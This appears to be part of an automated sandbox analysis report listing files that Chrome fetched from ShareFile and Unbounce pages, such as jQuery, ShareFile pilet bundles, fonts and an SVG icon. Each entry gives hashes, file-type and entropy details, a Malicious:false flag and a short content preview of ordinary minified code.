                                                                                                                                                                                                                                                                                Preview:/*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):188870
                                                                                                                                                                                                                                                                                Entropy (8bit):5.316783423719702
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:xZ2Qw6hfT5ppCWE9xpCAsdyiDlpf9s80zYKsvy5/YGZ:xXw6hfT5ppFEHpChdyqf+80zYKsq5/F
                                                                                                                                                                                                                                                                                MD5:3EB98FC30E286B34AE6A699333C2B13C
                                                                                                                                                                                                                                                                                SHA1:77C23C14692750726264F041C4A4A5AE8500F342
                                                                                                                                                                                                                                                                                SHA-256:A32F71A5A80553B0D31399E96A2288F045B600E289446F601D032909AB5B6614
                                                                                                                                                                                                                                                                                SHA-512:A1D7564C6D92A10087C813DC68FAA3C4B031B5BD97FB435B4C7470B8FF73218A6D74B24F5AA6786F0A98FF1C8BF2457728358BADE24037FCFF4732B2ED2E21AC
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevpublisherpilet,{}).System.register(["react","react-dom","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,i,s={2910:(e,t,r)=>{"use strict";r.d(t,{FK:()=>ke,Y:()=>Te,FD:()=>je});var n=r(4848),o=r(4726);var i=function(){function e(e){var t=this;this._insertTag=function(e){var r;r=0===t.tags.length?t.insertionPoint?t.insertionPoint.nextSibling:t.prepend?t.container.firstChild:t.before:t.tags[t.tags.length-1].nextSibling,t.container.insertBefore(e,r),t.tags.push(e)},this.isSpeedy=e.speedy===undefined||e.speedy,this.tags=[],this.ctr=0,this.nonce=e.nonce,this.key=e.key,this.container=e.container,this.prepend=e.prepend,this.insertionPoint
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 41268, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):41268
                                                                                                                                                                                                                                                                                Entropy (8bit):7.995563635685618
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:1z5A/nM7tFabxOf16mHI2tu3TJdcy6J01EenQHsmNQZ60G8MkMV:1aPMhFabxK6PzcJ0ueQXNQZ6J8MF
                                                                                                                                                                                                                                                                                MD5:B9EB4972777F0182FE841BBC280E5CDE
                                                                                                                                                                                                                                                                                SHA1:EDC69B1AA4B56048EA6B5C0217DABE8144036E25
                                                                                                                                                                                                                                                                                SHA-256:D37AB938D33FE41FEC69CC38C301A5AB7CB5AB928DBA29D9E9407582E08D3D24
                                                                                                                                                                                                                                                                                SHA-512:9575EC043889C64BF8B6C2055BDC6EAB943F0626BFAADE0A11006D5409DC2B4681AE4E789F5D3B06CB0DC047AE4A9F03CBE1EB80349D53ED24316D84F34A991C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/d8fcf3851ba79b1d138a.woff2
                                                                                                                                                                                                                                                                                Preview:wOF2.......4.......H....................................\.`..D.`........d.. .6.$..T..,.. ..2..;..=[....U...O*c@...~.8..3.dn.~..6:.......V}..........nR.C..i..]....C..F.....jA.....*.S.....*..K..Q.B.5w.P...4...~..T-A......[.Z.h...8-O-...2.%3...y.\d..A.0.Go..s..........\.GX..a...V....\.pK...t.5P......)Y2.cC..~..Z....V..!v..%.."....7.Ut..qgA..5..sJ...|...4....Y)......+9.!...,...Y.=W9..p<.........?.i..88..p..].G....c.$J.Y..z...'.h.g..sy.....9=..oq..!...P...L.[.....G..:.ss(..T.1.W.U.l.........Qmb....,.o...G...{o..?...o.;.#f....[".... ..H.4..xx.{w...*.5..,/!.L.i.#.DZZ...HK.%N..Om...B.$....a..#mj.Y....|.F{......HV..e/S.Z.#...j..l.....b].....eX/!<....f,vf..;........1wG|..6.L.}.!.!.$..5.{r..a.|. ........W...._*.'..L.4Dd3..Z.........l..t..b..%.?K>......\T.Mx...d.&A...Q....]uer.........xq.%l......h8m.*.......E.%|..?.Y...\....A[4f1.S...Z.)..e.!.$.....Ki.N.P.m.Ccl..j..;.... .?.qJ..\..<...^@..H..9klj..m.........@.......VoD\.^&0.3...5+#..N;.R.%...W#..S2.[..@.l.1!$
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65240)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1782918
                                                                                                                                                                                                                                                                                Entropy (8bit):5.4924843718382075
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:frbUsj4OAWyFP7tcL5tBrnnZnWS7B00gADDu/lHEINbXn3oMLWrro1Gxv2TA7ohu:1i7tcL20gADK/t7oOIZOk7oh9yhNP
                                                                                                                                                                                                                                                                                MD5:E43F171E9C550011E58426AF8E55DCEE
                                                                                                                                                                                                                                                                                SHA1:05690F9E9154EAEEA378573C4BB0154E8A2BCEE1
                                                                                                                                                                                                                                                                                SHA-256:34E128838A10E3BC3E8434E9E66C912A9056F635F7B3C0FA04A5E712D30F11F2
                                                                                                                                                                                                                                                                                SHA-512:628564DAA17FCF16641B214C36A22C4FA799FC24E8F03008B078E9F3DCB48E6FA1A7853F4C48940D60C8F22F032FC9447395694C279191C44C3677F623F04B1F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevdocgenpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(__WEBPACK_DYNAMIC_EXPORT__,__system_context__){var __WEBPACK_EXTERNAL_MODULE__8222__={},__WEBPACK_EXTERNAL_MODULE__4634__={},__WEBPACK_EXTERNAL_MODULE__4876__={},__WEBPACK_EXTERNAL_MODULE__4726__={},__WEBPACK_EXTERNAL_MODULE__1867__={},__WEBPACK_EXTERNAL_MODULE__2965__={},__WEBPACK_EXTERNAL_MODULE__8109__={};return Object.defineProperty(__WEBPACK_EXTERNAL_MODULE__4726__,"__esModule",{value:!0}),{setters:[function(e){__WEBPACK_EXTERNAL_MODULE__8222__.AccountsEntity=e.AccountsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.Api=e.Api,__WEBPACK_EXTERNAL_MODULE__8222__.ContactListType=e.ContactListType,__WEBPACK_EXTERNAL_MODULE__8222__.ContactsEntity=e.ContactsEntity,__WEBPACK_EXTERNAL_MODULE__8222__.CustomWorkflowBundleType=e.CustomWorkflowBundleType,__WEBPACK_EXTERNAL_MODULE__8222__.FileVirusStatus=e.FileVirusStatu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6378)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):6490
                                                                                                                                                                                                                                                                                Entropy (8bit):5.257387004754639
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:y2hG7a+HNCBCQ4vk8LJQM3nRoP7uFjOsMeZ:ia+H4BC3DLJTnRoP7uUi
                                                                                                                                                                                                                                                                                MD5:FAE76DAE7784930E96292B65FEEDBC0D
                                                                                                                                                                                                                                                                                SHA1:AFFD25E6159BE1645F1FFE8CE4BAFBF8D9710C3C
                                                                                                                                                                                                                                                                                SHA-256:69B7DBF013D733F4E7A1313102219E1D58DFA5F7D95D2ED590B88D935C8B1E84
                                                                                                                                                                                                                                                                                SHA-512:6B345E391AAB93D802A5B11FEF39EB86814027124CE7A9E45CBC63007316285900B095455DF21B73F542E8C60FC38E3ADF38B01DAF35CC70E98F118C719D6A30
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevremediationpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["@citrite/citrix-ui@25.46.0","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},o={},a={},i={};return{setters:[function(e){r.notifyError=e.notifyError,r.notifyInfo=e.notifyInfo,r.notifySuccess=e.notifySuccess},function(e){n.AntDConfigProvider=e.AntDConfigProvider,n.colorPalette=e.colorPalette},function(e){o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Flex=e.Flex,o.Modal=e.Modal,o.Row=e.Row,o.Space=e.Space,o.Switch=e.Switch,o.Tooltip=e.Tooltip,o.Typography=e.Typography,o.theme=e.theme},function(e){a.Fragment=e.Fragment,a.createContext=e.createContext,a.createElement=e.createElement,a.default=e.default,a.forwardRef=e.forwardRef,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useRef=e.useRef,a.useState=e.useState},function(e){i.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,l,s={8569:(e,t,r)=>{"use
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 38228, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):38228
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994856352167394
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:mO6CA6Mipbur8UxSr10MPoHe0nYhJdip/V1hCT61JyTMdCFI:F+EpbBUxS5jB0nEJdM/V1hb6TYz
                                                                                                                                                                                                                                                                                MD5:2C271D3DD009FEA397A3B044C1C3745E
                                                                                                                                                                                                                                                                                SHA1:F36ACD2305F82596563434582A3C21A797C0EFE7
                                                                                                                                                                                                                                                                                SHA-256:6C6485BBB9587494CBFAD91828B429192D9122392BA821555477D5A8D3F57414
                                                                                                                                                                                                                                                                                SHA-512:786FC7D6698792248A1231DD1E343CAA4FC612E277CB7B6A9B33AED072F219B10B7AE0776B594BC460A9CC7CA44D60BD56D667210D4F97189F516CB66A3EF626
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/91306a69f84f808e9310.woff2
                                                                                                                                                                                                                                                                                Preview:wOF2.......T.........................................2..\.`..D.`........<..h.6.$..T..,.. .....;..=[.jq..w.U1.nC.+.S6......)..m.6p.6<.......0A.......".5.... U..(..A...{.P.D.f.1NM...(..r+F.XD..$a..;...Q...~b.4j.<x...G...1..1...e4<V....@....{...1...G\pF:......h.5ot...a..;....t.q.GGV ...a2$...2d.w... 6...Y.R{......`s|...H.z..?..7rQ.#R4B0.&>.8j.YN.A3....P.._.?...:.)^.E......,1v=..,9.....#.............L......d..yp[......."" """..;E+S34K3..Lq.l...l..+....n.S[6.2...u.Y..y......`.^2.Al.+...u..@.<<...Of.M..J..5...Hj.%.K#.{.;...df..)...|...V.[....._i.G..l...Q.|..'7.m.m.6u(.3x.V6(.....}......j..&....<........_....P.F....u99..(...>..^p..U .{S.=.\..k...3$.....e...U.W....?...gA..$J.-E>.....i.|..l.D..0W.UX3i....!.m.'[I...6..L.L....~..I......._.Q.F..OK......"...u ...Y...w.2........U....I....r..%..)1A.....o^q.n...&...k..e..T2....a...?ts.[..G.'m..8..K.B.w....2*..J.XLg+>..*.M...6i..;..r...=j.u.....i.i".d9...2=.S..O....0......lG.."{..@..S.={.lS..)}.\..'..."..H.k.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, was "main.bundle.js", last modified: Mon Sep 9 20:00:08 2024, from Unix, original size modulo 2^32 141304
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):41618
                                                                                                                                                                                                                                                                                Entropy (8bit):7.994152214229324
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:CdNzUh9MZ4rjJcOi6lchaAcDaVpKUxrwCv2x64dqC1KSKA0m7e:CdNoE4uML8M+2SC1LKpm7e
                                                                                                                                                                                                                                                                                MD5:B5949B3BE4687909B13B22DFBA27D0EA
                                                                                                                                                                                                                                                                                SHA1:B16A1E63AEA899903B13FB2F970230A267A4CFB3
                                                                                                                                                                                                                                                                                SHA-256:258FD99067EC61C83A64592F068CB37B9621EB39C52A8B15D3F921DC19D697DD
                                                                                                                                                                                                                                                                                SHA-512:498A7A6DDA0EDB96844B462F486F69CCFEFE1B31966B322F80673170D2D99B004965D67CC87D93EEAEA145D182DF20FBA5B33078912BC5CBB74DAB9D5B237C70
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:http://builder-assets.unbounce.com/published-js/main.bundle-ef43f79.z.js
                                                                                                                                                                                                                                                                                Preview:.....S.f..main.bundle.js..[.s.F..+".N..#.R.{.h..q..\./r.UG1*.....1.``Y+r..}=......rU{uW...y.....Ao.T3-d.W..B...a;.'2.X....b5..&.9=.."..z..._K...a.e...YQ..N]9.,<../e..0.$.t+.U^1..r..y.R.....T.c......t:..Q..J..........W......:......x.C.T..<...~.....~5.....jy...n.......x..]e..7%...{.sts.k..w..,.:...........2....<.[..A..T.I3U..5..S.K.L..mk.;.f....US.....A".!.b.J....>..*4V}i..._..u..*6.v"@E...x.uw..1.SQ..]L%....xT.l....s..jGm.vT.:.......,*"H..4....c.ZI-i.._.U.YV.......Ip../..6...y......]...~Tp.V...".j...T..b~2.!(F...dy.....Ya...P...V.U.E...t53-Ug..4\._.S..tj..M`.>.:K.^...._l.X.)............[g.1.....4.".k...j..3..E).B..^3...[.&.Y..y..;..5.un..;. ....T....W.e5s.*~g....YQ.x.k.d1..oR..82.".SQ.........^ .%..fO.c.......u.=Z....]..V..-y....._.J/8.....[...&a...P..:.....".L.u..X=..t..QxD}f..Uu)f..tB..qT.[....G......]<..9..j.k3]W..;......._.|A.~....F....A..=..[7{.......q4m..R@.i.<...J...X.y5...%,3...{.6N.....x[.0..j}..V.?.P....I.'[E0..-D.n.R*.K#..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):113304
                                                                                                                                                                                                                                                                                Entropy (8bit):5.351512714972175
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:5p0GYZTZF6Wcw8qG5QZBWTO3USkODq6ItIeKCajtRgn2PwbWtdP27:5p0GEPiOEfaTglK527
                                                                                                                                                                                                                                                                                MD5:530A7B55C7F2519E38F8B06FE7B2AB6D
                                                                                                                                                                                                                                                                                SHA1:792B4A21E3F0A3CC0AFB3F0D5AE0C9BD4D686697
                                                                                                                                                                                                                                                                                SHA-256:F764709D6B4455A16AB263B1963537EEBE306D4B2B38430A3205EDE496610B4D
                                                                                                                                                                                                                                                                                SHA-512:1B7B00D586F840DD17EC225D5BAD62293B926CA173AB9534F7A4DDB44EFB5A89E1A29EB6CD0DBA17A051DC16BF1D519469A21050DA28E4A46748BA7AE1AEC60E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-audit-collector-pilet/0.11.0/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevauditcollectorpilet,{}).System.register(["antd","react","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Button=e.Button,r.DatePicker=e.DatePicker,r.Form=e.Form,r.Input=e.Input,r.Space=e.Space,r.Spin=e.Spin,r.notification=e.notification},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter}],execute:function(){e((()=>{var e,i,a,s,c={4386:(e,t,r)=>{"use strict";r.d(t,{j:()=>u});var n=r(8109);function o(e){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},o(e)}function i(){i=function(){return t};var e,t={},r=Object.prototype,n=r.hasOwnProperty,a=Object.defineProperty||function(e,t,r){e[t]=r.value},s="function"==typeof Symbol?Symbol:{},c=s.iterator||"@@iterator",u=s.asyncIte
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1592
                                                                                                                                                                                                                                                                                Entropy (8bit):4.205005284721148
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                                                                                                                                                                                                                                MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                                                                                                                                                                                                                                SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                                                                                                                                                                                                                                SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                                                                                                                                                                                                                                SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):690173
                                                                                                                                                                                                                                                                                Entropy (8bit):5.968276901365447
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:T4OQkV53hSjvRAgXqG7DNyp4IEUj8O2dIK9:Akv3hEZXqG7DN1Uj8O2T9
                                                                                                                                                                                                                                                                                MD5:66960F160A996198483C9B80DB9BB067
                                                                                                                                                                                                                                                                                SHA1:3B88BD8104FC9D78F6EFA282846F552C6DCD2902
                                                                                                                                                                                                                                                                                SHA-256:068BB5A28EB54D79EB794121A870099D967C5467E6F174850EF283B4D56F0D1B
                                                                                                                                                                                                                                                                                SHA-512:79DF7E7C84EC5AE68D914DC7F4956D9F4919DBB1867236EB04B5F7AD6E6E13F13EF9B78F5D1D2D3D54C2C3391EC69E2DB69044F3A66601D6256A8E20BA6C0DAD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/index.js
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevtemplatespilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},a={},s={},i={},o={},l={},u={};return Object.defineProperty(s,"__esModule",{value:!0}),Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.ItemsEntity=e.ItemsEntity,n.Uploader=e.Uploader,n.UsersEntity=e.UsersEntity,n.ZoneService=e.ZoneService,n.createFile=e.createFile},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){a.Alert=e.Alert,a.App=e.App,a.Avatar=e.Avatar,a.Button=e.Button,a.Card=e.Card,a.Checkbox=e.Checkbox,a.Col=e.Col,a.Collapse=e.Collapse,a.Divider=e.Divider,a.Drawer=e.Drawer,a.Dropdown=e.Dropdown,a.Flex=e.Flex,a.Form=e.Form,a.Input=e.Input,a.Layout=e.Layout,a.List=e.List,a.Menu=e.Menu,a.Modal=e.Modal,a.Result=e.Result,a.Row=e.Row,a.Select=e.Select,a.Skeleton=e.Skeleton
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (65399)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):904512
                                                                                                                                                                                                                                                                                Entropy (8bit):5.71994782288608
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:qfKDRWFuEqilY7RuaOoFyXP10uAxa9WA3mVj/jEphnAj3wdArqUP4NqclO:qfKDlEqilY7Ru1SVoirqUP4NqclO
                                                                                                                                                                                                                                                                                MD5:4BCA71B5E96BA1017D2F126850C99835
                                                                                                                                                                                                                                                                                SHA1:E48A42C801197D142912941554398979EEE0A639
                                                                                                                                                                                                                                                                                SHA-256:6B98719775F73C629E39427EDF4D3A67506C6AF5E7ED2C9C80F630A1EE0ED03E
                                                                                                                                                                                                                                                                                SHA-512:9524339F39E746523AC7931388045BB5DDDDDD7D7E777543236188B95C78E4FEF1A493045C8BD6E48BC52B55017B3EE44B6A6E7577235AF6FA8C101D277F273B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"}).System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.AlertErrorIcon=e.AlertErrorIcon,r.Button=e.Button,r.Checkbox=e.Checkbox,r.CircleOutlinedXIcon=e.CircleOutlinedXIcon,r.EmptyState=e.EmptyState,r.LoadingPrimary=e.LoadingPrimary,r.PageTitle=e.PageTitle,r.SettingsField=e.SettingsField,r.ThemeColor=e.ThemeColor,r.Toggle=e.Toggle,r.fromThemeColors=e.fromThemeColors,r.notifyError=e.notifyError,r.notifySuccess=e.notifySuccess},function(e){o.__assign=e.__assign,o.__awaiter=e.__awaiter},function(e){i["default"]=e["default"],i.findDOMNode=e.findDOMNode,i.flushSync=e.flushSync}],execute:function(){e((()=>{var e={9272:(e,t,n)=>{"use strict";var r=n(723),o=[],i=[],a=r.makeRequestCallF
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):119043
                                                                                                                                                                                                                                                                                Entropy (8bit):5.3912038503798305
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:g3xVjF5wKuU3zGmqnDAcOwFJ5+H344FDt21B7sAhgod64QUdaBzET002nbyOs:awjU2OGyI4Fsz
                                                                                                                                                                                                                                                                                MD5:C6FD21E7E412186282D2436A3067AAD3
                                                                                                                                                                                                                                                                                SHA1:F0D0C2525A1C8140D401068F69FDC1AAF0705C40
                                                                                                                                                                                                                                                                                SHA-256:42A04812F58A260F6D26930F471BDD24E2D7E14573169F7CB622C0F6D7C69DC6
                                                                                                                                                                                                                                                                                SHA-512:71C0ED0DA2626CC4E33EA2157DB00AA4AA2D3DE403A47472420994F5AFE3E0F649CA58D1C015247EAF0D22D9887358D2D5801DE369596168D466C2872B4E77FB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview://@pilet v:2(webpackChunkpr_sharefiledevviewuserpilet,{}).System.register(["@sharefiledev/antd-config","antd","react","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){n.sizes=e.sizes},function(e){r.Alert=e.Alert,r.Button=e.Button,r.Card=e.Card,r.Checkbox=e.Checkbox,r.Col=e.Col,r.ConfigProvider=e.ConfigProvider,r.DatePicker=e.DatePicker,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Empty=e.Empty,r.Flex=e.Flex,r.Form=e.Form,r.Grid=e.Grid,r.Input=e.Input,r.InputNumber=e.InputNumber,r.Layout=e.Layout,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Popconfirm=e.Popconfirm,r.Radio=e.Radio,r.Result=e.Result,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Slider=e.Slider,r.Space=e.Space,r.Spin=e.Spin,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tag=e.Tag,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},func
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, was "main.css", last modified: Wed Sep 18 21:13:19 2024, from Unix, original size modulo 2^32 15106
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2944
                                                                                                                                                                                                                                                                                Entropy (8bit):7.922707200965597
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:Xlho1kyMoWIrJOEUF5GN3CS0c9xd2vUBR591cyRtrkX0uFDiIFEjGnam+M50v7Au:fo1leIrJH85WZOO1cybwXBFuO7+pEX+
                                                                                                                                                                                                                                                                                MD5:54BF75D03E588470D1A76CDBD7AB5C1D
                                                                                                                                                                                                                                                                                SHA1:7CE9E3089BBDE44D5EC04B2F6FC176EF73C0B5A5
